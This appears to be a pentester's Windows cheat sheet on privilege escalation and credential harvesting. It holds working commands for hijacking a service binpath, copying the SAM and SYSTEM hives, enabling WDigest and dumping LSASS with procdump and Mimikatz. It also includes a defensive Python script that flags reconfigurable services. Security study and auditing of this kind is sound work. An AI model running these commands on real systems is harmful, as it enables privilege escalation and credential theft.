Privilege Escalation¶
- WinPEAS
- LinPEAS
- Windows Exploit Suggester
- SweetPotato, JuicyPotato, LonelyPotato, HotPotato
- BloodHound
Credential Harvesting¶
- Responder
- Inveigh
- Mimikatz
- ntdsutil
- secretsdump
- Impacket
Service Exploits¶
Insecure Service Permissions¶
1. Find a writable service.
   - accesschk.exe
       # accesschk.exe [-d] [-k] [-p [-f]] [-c] [-o [-t <object type>]] [-r] [-w] [<username>] { <file (default)> | <directory> | <registry key> | <process> | <service> | <object> }
       #   -d  only process directories or top-level key
       #   -k  name is a Registry key
       #   -p  name is a process name or PID (-f: show full process token information)
       #   -c  name is a Windows Service
       #   -o  name is an object in the Object Manager namespace (-t <object type>)
       #   -r  show read access only
       #   -w  show write access only
       accesschk.exe /accepteula -uwcqv user *
2. Overwrite the service config.
   - sc
       sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
3. Start the service.
   - sc
       sc start daclsvc
   - net
       net start daclsvc
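As an added audit example (not code from the original page), the following Python script parses `accesschk -uwcqv <user> *` style output and flags services where the user holds a right that permits the binpath change in step 2, so the misconfiguration can be found and fixed before anyone abuses it. The sample output is constructed to mimic accesschk's format; the service names are placeholders.

```python
import re
from dataclasses import dataclass, field

# Rights that let the principal rewrite the service's binary path (or seize
# the DACL and then do so). SERVICE_START / SERVICE_STOP alone do not.
CONFIG_WRITE_RIGHTS = {
    "SERVICE_ALL_ACCESS", "SERVICE_CHANGE_CONFIG",
    "GENERIC_ALL", "GENERIC_WRITE", "WRITE_DAC", "WRITE_OWNER",
}

@dataclass
class ServiceAccess:
    name: str
    rights: list = field(default_factory=list)

def parse_accesschk(text):
    """Parse accesschk -uwcqv output: 'RW <svc>' header, indented right names below."""
    services = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = re.match(r"^(RW|R|W)\s+(\S+)\s*$", line)
        if m:                                   # header line: summary + service name
            services.append(ServiceAccess(m.group(2)))
        elif line[0].isspace() and services:    # right granted on the last service
            services[-1].rights.append(line.strip())
    return services                             # banner lines are skipped

def reconfigurable_services(text):
    """Return {service: [dangerous rights]} for services whose config can be rewritten."""
    findings = {}
    for svc in parse_accesschk(text):
        bad = sorted(set(svc.rights) & CONFIG_WRITE_RIGHTS)
        if bad:
            findings[svc.name] = bad
    return findings

# Constructed sample, shaped like accesschk output (placeholder service names).
SAMPLE = """\
RW daclsvc
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        SERVICE_START
        SERVICE_STOP
        READ_CONTROL
RW fullaccesssvc
        SERVICE_ALL_ACCESS
RW startonlysvc
        SERVICE_START
        SERVICE_STOP
"""

if __name__ == "__main__":
    for name, rights in reconfigurable_services(SAMPLE).items():
        print(f"{name}: config can be rewritten via {', '.join(rights)}")
```

Feed it real output from the accesschk command above to get the list of services whose DACL should be tightened.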
Potato Attacks¶
Print Spoofer¶
PrintSpoofer - Abusing Impersonation Privileges on Windows 10 and Server 2019 | itm4n
Pass the Hash¶
Hash Source¶
SAM (registry)¶
Local accounts only.
- Export
  - reg
      cmd> reg save HKLM\SAM .\sam.reg
      cmd> reg save HKLM\SYSTEM .\system.reg
  - vssadmin
      cmd> vssadmin create shadow
      cmd> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM .\sam.reg
      cmd> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM .\system.reg
- Show
      sh> samdump2 system sam
LSASS (memory)¶
Logged-on accounts only.
- Prerequisite
      cmd> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f
- Export
      cmd> procdump.exe -accepteula -ma lsass.exe lsass.dmp
- Show
  - From dump file
      mimikatz> sekurlsa::minidump lsass.dmp
      mimikatz> sekurlsa::logonPasswords
  - Live
      mimikatz> privilege::debug
      mimikatz> sekurlsa::logonpasswords